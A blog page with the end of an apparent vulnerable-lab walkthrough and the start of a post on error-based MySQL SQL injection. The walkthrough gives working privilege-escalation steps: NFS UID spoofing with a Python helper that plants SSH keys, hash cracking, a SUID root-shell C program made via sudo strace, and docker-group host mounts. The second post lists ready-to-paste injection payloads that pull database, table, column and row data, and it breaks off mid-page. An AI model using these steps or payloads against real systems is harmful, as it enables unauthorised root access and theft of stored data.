<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgapbV1DjfuIp97ixVWArZs73JBikmDmY4kAabWnMoZs72vJ6sUkFlQtgbSG8S6RvLPSYEq-MEZgNdjfhjA2cY8Fey7XP4LxqlY5lLJjwzkokLtMx_wIltWqA0g75B7qCtEV0EmBjVALUo/s1600/permission.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="842" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgapbV1DjfuIp97ixVWArZs73JBikmDmY4kAabWnMoZs72vJ6sUkFlQtgbSG8S6RvLPSYEq-MEZgNdjfhjA2cY8Fey7XP4LxqlY5lLJjwzkokLtMx_wIltWqA0g75B7qCtEV0EmBjVALUo/s1600/permission.png" /></a></div>
<br />
<br />
Some searching turned up the classic NFS weakness: with the default AUTH_SYS authentication the server never verifies who the client is, it simply trusts the numeric UID and GID the client process presents. In other words, "to access an NFS share, the uid and gid need to match the ones of the shared directory on the server". The usual root_squash option only remaps UID 0, so a non-root UID like the one here is accepted as-is.<br />
Here the mounted directory is owned by UID 1001 and GID 1005.<br />
<br />
So on the attacker machine we need a local user with UID 1001 and GID 1005. The account name is irrelevant, only the numbers matter; I reused the existing "ftp" account and changed its ids.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGu_GK9uE6DFOzT1DCXd_b46lEJDMW_zW4756m_huklfrkvyyXOlBh-0HBOc1QzJh8ufhja5DvFB76CF7pKehbhmAMu4bSYQvo3b9a6onJEzqauLWkodex2cpmMWKNZo6VNzo3zW6rVXI/s1600/user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="108" data-original-width="534" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGu_GK9uE6DFOzT1DCXd_b46lEJDMW_zW4756m_huklfrkvyyXOlBh-0HBOc1QzJh8ufhja5DvFB76CF7pKehbhmAMu4bSYQvo3b9a6onJEzqauLWkodex2cpmMWKNZo6VNzo3zW6rVXI/s1600/user.png" /></a></div>
<br />
After changing the UID and GID of the "ftp" user, switch to it and try to create a file on the mounted share to confirm that we can write there.<br />
<br />
Then I created a ".ssh" directory on the share and copied the public key "id_rsa.pub" of the "ftp" user into it as "authorized_keys", so that I can SSH into the machine as peter with that key. Keep ".ssh" at mode 700 and "authorized_keys" at 600; sshd's StrictModes check ignores the file when it is writable by others.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCUqg54qu0-N4t_AVelLNthRP0Tcu1twc0n2Dp7KfxHNiny_GSD5iLsjXs3FwsL36jVgObD3Dp6Ku3cA1nYTn0YED2WsRyJfaZ-KVO_G5hmT901WofG1cGWAAnPK5LO4p6s5DhkJVUqmA/s1600/key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="205" data-original-width="776" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCUqg54qu0-N4t_AVelLNthRP0Tcu1twc0n2Dp7KfxHNiny_GSD5iLsjXs3FwsL36jVgObD3Dp6Ku3cA1nYTn0YED2WsRyJfaZ-KVO_G5hmT901WofG1cGWAAnPK5LO4p6s5DhkJVUqmA/s1600/key.png" /></a></div>
<br />
After pushing the key file, we can log in to the machine with the command below (add "-i" with the path to the matching private key if it is not the default key of the current user):<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">ssh peter@machine_IP</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOarY5npUspFGY92Ted4hyphenhyphen9hRk2psp6fDe3clcVwnTCLSZQWwwUI4UA1mvvhDg81ShfasB21fPSTPsUdp-4btxhDqJOryKjp7MT_gIgbermXq5LdBRyhTLL80dIpVvJfTqgTMEnwx2l4/s1600/nfs+share+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="1054" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOarY5npUspFGY92Ted4hyphenhyphen9hRk2psp6fDe3clcVwnTCLSZQWwwUI4UA1mvvhDg81ShfasB21fPSTPsUdp-4btxhDqJOryKjp7MT_gIgbermXq5LdBRyhTLL80dIpVvJfTqgTMEnwx2l4/s1600/nfs+share+6.png" /></a></div>
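Putting the NFS steps above together, here is an added Python helper (my own, not from the walkthrough) that parses "showmount -e" output for world-mountable exports, reads the UID/GID off a mounted directory, prints the groupadd/usermod commands that give a throwaway local account the same ids, and plants an authorized_keys entry with the file modes sshd expects, without clobbering keys already there. The sample showmount output, the host address and the public key are constructed; the real-run branch assumes showmount, mount and usermod are on the attacker's PATH and is run as root, and dry_run() exercises the planting logic on a scratch directory.<br />

```python
import os
import stat
import subprocess
import sys
import tempfile
from pathlib import Path

# Constructed sample of `showmount -e` output; the host and the second export are invented.
SAMPLE_SHOWMOUNT = """\
Export list for 192.168.56.101:
/home/peter *
/srv/backup 10.0.0.0/24
"""
# Constructed throwaway public key, not a real one.
SAMPLE_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleExampleExampleExampleExa attacker"


def parse_exports(text):
    """Map each exported path to the client list mountd reports for it."""
    exports = {}
    for line in text.splitlines()[1:]:          # line 0 is the "Export list for" header
        parts = line.split(None, 1)
        if len(parts) == 2:
            exports[parts[0]] = parts[1].split(",")
    return exports


def world_mountable(text):
    """Exports anyone may mount: showmount prints '*' or '(everyone)' for them."""
    return [p for p, c in parse_exports(text).items() if "*" in c or "(everyone)" in c]


def owner_ids(path):
    """UID/GID the server stamped on the directory. With AUTH_SYS the server
    trusts whatever numeric ids the client presents, so these are the ids to adopt."""
    st = os.stat(path)
    return st.st_uid, st.st_gid


def id_fixup_commands(local_user, uid, gid):
    """Root commands for the attacker box that give a throwaway local account the
    matching ids; the account name itself means nothing to the NFS server."""
    return ["groupadd -g %d nfs%d 2>/dev/null || true" % (gid, gid),
            "usermod -u %d -g %d %s" % (uid, gid, local_user)]


def plant_authorized_key(home, pubkey):
    """Append pubkey to <home>/.ssh/authorized_keys with the modes sshd's StrictModes
    accepts (0700 dir, 0600 file). Appending keeps the victim's own keys intact."""
    ssh_dir = Path(home) / ".ssh"
    ssh_dir.mkdir(mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)
    ak = ssh_dir / "authorized_keys"
    entry = pubkey.strip() + "\n"
    existing = ak.read_text() if ak.exists() else ""
    if entry not in existing:                   # idempotent: no duplicate lines
        with ak.open("a") as fh:
            fh.write(entry)
    os.chmod(ak, 0o600)
    return {
        "path": str(ak),
        "key_count": ak.read_text().count(pubkey.split()[1]),
        "dir_mode": stat.S_IMODE(os.stat(ssh_dir).st_mode),
        "file_mode": stat.S_IMODE(os.stat(ak).st_mode),
    }


def dry_run():
    """Exercise the planting logic on a scratch directory instead of a real mount;
    we own the scratch dir, so the id comparison trivially succeeds."""
    scratch = tempfile.mkdtemp(prefix="nfs-demo-")
    plant_authorized_key(scratch, SAMPLE_PUBKEY)
    report = plant_authorized_key(scratch, SAMPLE_PUBKEY)   # second run must not duplicate
    uid, gid = owner_ids(scratch)
    report["ids_match"] = (uid, gid) == (os.getuid(), os.getgid())
    report["fixup"] = id_fixup_commands("ftp", uid, gid)
    return report


if __name__ == "__main__":
    # Real run (as root): python3 nfs_plant.py <target_ip> <local_mount_dir>
    # Assumes showmount, mount and usermod are on PATH; plant the key only after
    # switching to the fixed-up local user, otherwise the server refuses the write.
    if len(sys.argv) != 3:
        print(dry_run())
        sys.exit(0)
    target, mnt = sys.argv[1], sys.argv[2]
    listing = subprocess.run(["showmount", "-e", target], capture_output=True,
                             text=True, check=True).stdout
    for export in world_mountable(listing):
        subprocess.run(["mount", "-t", "nfs", "-o", "nolock",
                        "%s:%s" % (target, export), mnt], check=True)
        uid, gid = owner_ids(mnt)
        print("%s owned by uid=%d gid=%d; run:\n%s" %
              (export, uid, gid, "\n".join(id_fixup_commands("ftp", uid, gid))))
        break
```

The only thing the server checks is the numeric pair, which is why usermod on the attacker side is the whole "exploit"; the rest is ordinary file handling, plus the 700/600 modes so sshd actually honours the planted key.<br />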
<br />
<br />
Now we are inside the machine. Reading "/etc/passwd", I found an entry for the OS user "insecurity" with UID 0 and a Unix password hash sitting in the second field, where modern systems keep only an "x" placeholder to indicate that the real hash lives in "/etc/shadow".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eTzICyYKCofbIta1oSEC2APmeDzVzyY9AhY-b6Y6LQZW4LOSucWoOEvoZW0i_SaGCme61V5Mo8_XyRjLsfjdaNGOOGLT5E1Q0V2nf4HiB-PPRHvZfYzfy0Ap_24RQ2NC3oGIWeSypAk/s1600/uid+0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="363" data-original-width="1038" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eTzICyYKCofbIta1oSEC2APmeDzVzyY9AhY-b6Y6LQZW4LOSucWoOEvoZW0i_SaGCme61V5Mo8_XyRjLsfjdaNGOOGLT5E1Q0V2nf4HiB-PPRHvZfYzfy0Ap_24RQ2NC3oGIWeSypAk/s1600/uid+0.png" /></a></div>
<br />
On older systems "/etc/passwd" held the password hashes themselves, and because that file is world-readable any such hash can be cracked offline. I cracked it with Hashcat and recovered the plaintext password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNjDYoQFGS4SqZznavHErrKXZNX1Zj0fWrX13hynppldrmiKfoP5ww2VGRb3R2Ormu1XX7hPgzuA39xyxlUHxtMYIbRlq_PR3zrLdbbBczqNTAbcRcBZ7RYsmSuEDutvC4-LbXFfmssmw/s1600/hash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="467" data-original-width="1318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNjDYoQFGS4SqZznavHErrKXZNX1Zj0fWrX13hynppldrmiKfoP5ww2VGRb3R2Ormu1XX7hPgzuA39xyxlUHxtMYIbRlq_PR3zrLdbbBczqNTAbcRcBZ7RYsmSuEDutvC4-LbXFfmssmw/s1600/hash.png" /></a></div>
<br />
Then I logged in as "insecurity" with the recovered password. Since the account has UID 0, that login already is a root shell, which is the first way of getting root privileges on this machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm7Jnkfdov7IpbYYBCnWX7H6ops0lW3KTmYJx3BTj2NNCNd05kaC-K1vWjdAy2OCEiaYef2l7Py2JEhMkif6UFOr_c5PVgdX2nEM9uwrMcYst1SMcEcLuOxmpidN69rU_L4hgPGtDRjhY/s1600/root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="1194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm7Jnkfdov7IpbYYBCnWX7H6ops0lW3KTmYJx3BTj2NNCNd05kaC-K1vWjdAy2OCEiaYef2l7Py2JEhMkif6UFOr_c5PVgdX2nEM9uwrMcYst1SMcEcLuOxmpidN69rU_L4hgPGtDRjhY/s1600/root.png" /></a></div>
<br />
As the machine designer mentioned, there are multiple ways to root this machine, so I checked other possibilities as well and found that user "peter" can run the "strace" binary with sudo. To check whether a user may run any binary through sudo, use:<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">sudo -l </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5rGDBRJfH_EYkyvcp7aDoQYY_-TAas0o5ulJi9xcZfcbGGL4WmUuM4GXsqZB7O4K35LtXTkM_5WXTHl6vo19Flw4nAw7Omqzaue4TIuZr5oXmUZK8SZ4ltqDZ6412X-4bg6qrU3iaOh4/s1600/sudo+ouput.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="262" data-original-width="1224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5rGDBRJfH_EYkyvcp7aDoQYY_-TAas0o5ulJi9xcZfcbGGL4WmUuM4GXsqZB7O4K35LtXTkM_5WXTHl6vo19Flw4nAw7Omqzaue4TIuZr5oXmUZK8SZ4ltqDZ6412X-4bg6qrU3iaOh4/s1600/sudo+ouput.png" /></a></div>
<br />
Now, to take advantage of running "strace" with sudo: sudo starts strace as root, and strace simply forks and executes whatever command it is given as that same root user, so any command placed after "strace" runs as root (a shell works just as well, e.g. "sudo strace -o /dev/null /bin/sh", but the SUID route below leaves a reusable binary behind). My plan was to compile a small C program that drops the user into a "/bin/sh" shell, then use "sudo strace" to change its owner to root and set the SUID bit on it.<br />
<br />
The C program I used:<br />
<textarea cols="40" rows="17">#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Run as a root-owned SUID binary, the effective UID is already 0.
 * setuid(0)/setgid(0) make the real ids 0 as well, so the shell spawned
 * below keeps root instead of dropping back to the caller. Ubuntu's
 * /bin/sh is dash, which does not drop privileges on its own. */
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/sh");
    return 0;
}
</textarea>
<br />
<br />
I compiled the program with the command below:<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">gcc r.c -o r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_V17w3gP_K9tTjth6V3Xel4sfeUrkOna2mMfSvZlPy5jDfYkgI764WLVyNC01N1okFf6i-AS0qZ_qFAmenc2XtyNgnIERjGFtBLltS8_haMB0k19Ir7FnZPdbKkqAB85cIAy0MlKnHas/s1600/compiling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="543" data-original-width="847" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_V17w3gP_K9tTjth6V3Xel4sfeUrkOna2mMfSvZlPy5jDfYkgI764WLVyNC01N1okFf6i-AS0qZ_qFAmenc2XtyNgnIERjGFtBLltS8_haMB0k19Ir7FnZPdbKkqAB85cIAy0MlKnHas/s1600/compiling.png" /></a></div>
<br />
<br />
After compiling, I ran the command below to change the ownership of the compiled binary (chown runs as root under strace, so it is allowed to give the file to root):<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">sudo /usr/bin/strace chown root:root r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnKeHNPXUEr-2jN4UoB0gepFlNQFSyqAEW7c8-p0uTc9tpsAFPgrH9oNq-1j4Ea0VcCU88PMFGCytYFODXn9K4juhxpb_e5bBzfhZCYg2ObrEk_eSBEAfMIO_qBvvQTX2u36EdNIoOXqo/s1600/before+chown.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="550" data-original-width="960" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnKeHNPXUEr-2jN4UoB0gepFlNQFSyqAEW7c8-p0uTc9tpsAFPgrH9oNq-1j4Ea0VcCU88PMFGCytYFODXn9K4juhxpb_e5bBzfhZCYg2ObrEk_eSBEAfMIO_qBvvQTX2u36EdNIoOXqo/s1600/before+chown.png" /></a></div>
<br />
Check whether the command executed successfully:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd-WT2c4iO2EhYuFjSrLh9t54ZuAvNnC-L3EMVLNM7uBqCfdjkS6BAHTsLBEREnvLp5TIZ3e6qZxSIDFTifmBBqk5GJVz6KLXA7Tv0CQVQtZ0k0CT8pMHz7KzqtA1uOjBhtsO5mgxImqI/s1600/after+chown.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="609" data-original-width="958" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd-WT2c4iO2EhYuFjSrLh9t54ZuAvNnC-L3EMVLNM7uBqCfdjkS6BAHTsLBEREnvLp5TIZ3e6qZxSIDFTifmBBqk5GJVz6KLXA7Tv0CQVQtZ0k0CT8pMHz7KzqtA1uOjBhtsO5mgxImqI/s1600/after+chown.png" /></a></div>
<br />
It worked and the binary is now owned by "root".<br />
To set the SUID bit on the file, run chmod the same way through "strace" with sudo:<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">sudo /usr/bin/strace chmod u+s r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdwLENXoVAS52G2ZwekQIRIsO0hZzJWjuvZfG8Vwd3LHcnpjUTWlJHrb3NOdQJmgb28nS2rhNIZHwMlfGgv1700rDj9k5yuLn3CuPGTKzLJWYfwUFSxhrqA9usW2e8nbjr4pb5rH46ztE/s1600/before+chmod.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="1042" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdwLENXoVAS52G2ZwekQIRIsO0hZzJWjuvZfG8Vwd3LHcnpjUTWlJHrb3NOdQJmgb28nS2rhNIZHwMlfGgv1700rDj9k5yuLn3CuPGTKzLJWYfwUFSxhrqA9usW2e8nbjr4pb5rH46ztE/s1600/before+chmod.png" /></a></div>
<br />
Let's check whether the SUID bit is set by listing the file permissions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3MhzkPVDPbUwnsZZgikHiQRoucwWOR7ylc2-ZJSluUX6vAxX3OsXY5TF6y5UcKsapFMzj46DK6aRKSy1DAjFZSeDTx14NOYRGpXCoi7-e1TkVFHjnJcFafqLIsziYX4VrxOlYlI3OHiQ/s1600/after+chmod.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="643" data-original-width="863" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3MhzkPVDPbUwnsZZgikHiQRoucwWOR7ylc2-ZJSluUX6vAxX3OsXY5TF6y5UcKsapFMzj46DK6aRKSy1DAjFZSeDTx14NOYRGpXCoi7-e1TkVFHjnJcFafqLIsziYX4VrxOlYlI3OHiQ/s1600/after+chmod.png" /></a></div>
<br />
Great, the SUID bit is set as well. Now we just need to execute the binary: its owner is "root" and the SUID bit is set, so it starts with root's effective UID, the program raises the real UID to 0 as well, and the "/bin/sh" it spawns therefore runs as "root".<br />
Let's execute the binary and check whether we got "root" privileges with the command below:<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">./r</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCrNR864bqdTeLuQnR_PXnSzHeqe4TSAa5XehkzIgjK2J3_v9fw9kaG6zcT_TGmJeOe7QUnCgXQ5Tf6ovtvvJ4v1xEAv5wvQ06UhVsD0OzR9Rg-K8NH7vztgewLpiZvLuNDoC6q8S2lFE/s1600/got+root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="743" data-original-width="1220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCrNR864bqdTeLuQnR_PXnSzHeqe4TSAa5XehkzIgjK2J3_v9fw9kaG6zcT_TGmJeOe7QUnCgXQ5Tf6ovtvvJ4v1xEAv5wvQ06UhVsD0OzR9Rg-K8NH7vztgewLpiZvLuNDoC6q8S2lFE/s1600/got+root.png" /></a></div>
<br />
And yes, it worked: we are now in a root "/bin/sh" shell :)<br />
<br />
<b>Using Docker</b><br />
The machine runs Docker, and a little searching showed that any OS account in the "docker" group can talk to the Docker daemon, which itself runs as root. Such a user can start a container with the host's root filesystem bind-mounted into it and is root inside that container, so every host file is readable and writable ("chroot /host" inside the container gives a root shell on the host filesystem). Membership in "docker" is therefore equivalent to root; "--privileged" is not even needed for this, the bind mount alone is enough. Either of the commands below does it; the first mounts "/" at "/host" inside a bash container, the second uses an image built for exactly this purpose:<br />
<br />
<span style="color: #ff9933; font-family: "comic sans ms"; font-size: small;">docker run --privileged --interactive --tty --volume /:/host bash<br />
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease</span></div>
<br />
Our current user is a member of the "docker" group:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUNQpco5glCBzIdbxFE8ajUC_FMRVyY6JZaHXACewfzGDrdhwFzJG2QHtBKLiDPBOObyKB5hB4FUPTtlaAW_7_-t9CHS9U6dMzoeWenDMWxaF_YSnSmZKsuOFFTykIJihKT6rLyap2T4/s1600/user+priv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="91" data-original-width="701" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqUNQpco5glCBzIdbxFE8ajUC_FMRVyY6JZaHXACewfzGDrdhwFzJG2QHtBKLiDPBOObyKB5hB4FUPTtlaAW_7_-t9CHS9U6dMzoeWenDMWxaF_YSnSmZKsuOFFTykIJihKT6rLyap2T4/s1600/user+priv.png" /></a></div>
<br />
Let's get a root shell using the commands above xD<br />
<br />
Using the first command:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmHPynoZHHS2LRlGprb3PZsqrnfCrkSPZReJ5ZnCNuAVmDvVahFgxnGDrtuPjj_LPxADmLmbINU1TmNCTdSqFVLMq7JM2mcYZiRXUuzmoIq2FISracOigQpPptNvB5NB_Ma46FpoWeHxs/s1600/docker1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="1331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmHPynoZHHS2LRlGprb3PZsqrnfCrkSPZReJ5ZnCNuAVmDvVahFgxnGDrtuPjj_LPxADmLmbINU1TmNCTdSqFVLMq7JM2mcYZiRXUuzmoIq2FISracOigQpPptNvB5NB_Ma46FpoWeHxs/s1600/docker1.png" /></a></div>
<br />
Using the second command:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvi1kqGUxgLOj-6cUbI8I526foanpu83v0rrutpVg2kDCbw5AmhUtevvgGeSXRb35yxxTLd8ndIq27wT9Ox3DCy-HeEDgnfeamqMviNMVMEIFSen9rXcnPpduFxmjJ1tgQzHo-Z0E2SI/s1600/docker2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="477" data-original-width="1211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFvi1kqGUxgLOj-6cUbI8I526foanpu83v0rrutpVg2kDCbw5AmhUtevvgGeSXRb35yxxTLd8ndIq27wT9Ox3DCy-HeEDgnfeamqMviNMVMEIFSen9rXcnPpduFxmjJ1tgQzHo-Z0E2SI/s1600/docker2.png" /></a></div>
<br />
<br />
As the machine designer mentioned, there are multiple ways to get "root" privileges on this machine, so try to find the other ways as well.<br />
<br />
Thanks for reading.<br />
<br />
<br />
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-33446857159666703182018-03-05T00:25:00.000+05:302019-05-24T17:04:49.397+05:30Error based SQL Injection - MySQL <div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to All _/\_<br />
<br />
This blog post is about exploiting error-based SQL injection (MySQL only). The idea is to make the database raise an error whose message carries data we choose; when the application echoes database errors to the page, the data comes out inside the error text.<br />
<br />
The payloads in Case 1 and Case 2 use the floor(rand(0)*2) GROUP BY technique: the value we want is wrapped in "~" markers, concatenated with floor(rand(0)*2) and used as a GROUP BY key. Because rand(0) is seeded, its sequence of 0/1 values is fixed, and MySQL ends up inserting the same key twice into the temporary table it builds for the GROUP BY, so the query fails with "Duplicate entry '~~value~~1' for key 'group_key'" and the value is printed with the error. The outer FROM only needs a few rows to group over, which information_schema.tables always provides.<br />
<br />
<b>Case 1 - Integer Based</b><br />
<br />
<u>Database Name extraction</u> <br />
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)<br />
<br />
<u>Table name extraction</u><br />
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) <br />
<br />
To extract the next table name, change the value in the limit clause from 0,1 to 1,1 and so on.<br />
<br />
<br />
<u>Column name extraction</u><br />
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) <br />
<br />
To extract the next column name, change the value in the limit clause from 0,1 to 1,1 and so on. Without a table_name condition this walks through the columns of every table in the database; add "and table_name='data'" (your table) to the where clause to restrict it to one table.<br />
<br />
<br />
<u>Data extraction</u><br />
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) <br />
<br />
In my case the column name is "user" and the table name is "data"; replace them with the appropriate column and table names to extract data. "limit 0,1" returns the first row, "limit 1,1" the second, and so on.<br />
<br />
<br />
<b>Case 2 - String Based</b><br />
The payloads are the same as in Case 1, with a leading single quote to close the application's string literal and " and 1<'2" at the end to re-balance the closing quote the original query appends.<br />
<br />
<u>Database Name extraction</u> <br />
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX8ofHe9ZIrm9mXIrLCRBAGFRRTOLIBImK1d5fIH2vjaq4nvi6Omm8hKROidp4jd4iHpn45TUHHR0Psn0k8LLlvGJQi59vA92FaLL-MEiZv3VypzGIYmYbMvTSxF843p8FPKyu0naLp-4/s1600/database+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="559" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX8ofHe9ZIrm9mXIrLCRBAGFRRTOLIBImK1d5fIH2vjaq4nvi6Omm8hKROidp4jd4iHpn45TUHHR0Psn0k8LLlvGJQi59vA92FaLL-MEiZv3VypzGIYmYbMvTSxF843p8FPKyu0naLp-4/s1600/database+1.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<br />
<u>Table name extraction</u><br />
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-ozKi17bbLT1ip0y6Sbku0ua94kbDQG172VWwWRUGVMIob8i1526gNKf2niwE_XkL5tZsdbUWaMiRvVzbXEE9Hj0bSeEgEJfKRcRCHRDmwg2-pC-IrqLMHM8yeYNOWRXiajLm-w0ozOI/s1600/table+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="677" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-ozKi17bbLT1ip0y6Sbku0ua94kbDQG172VWwWRUGVMIob8i1526gNKf2niwE_XkL5tZsdbUWaMiRvVzbXEE9Hj0bSeEgEJfKRcRCHRDmwg2-pC-IrqLMHM8yeYNOWRXiajLm-w0ozOI/s1600/table+1.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<br />
To extract the next table name, change the value in the limit clause from 0,1 to 1,1 and so on.<br />
<br />
<u>Column name extraction</u><br />
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
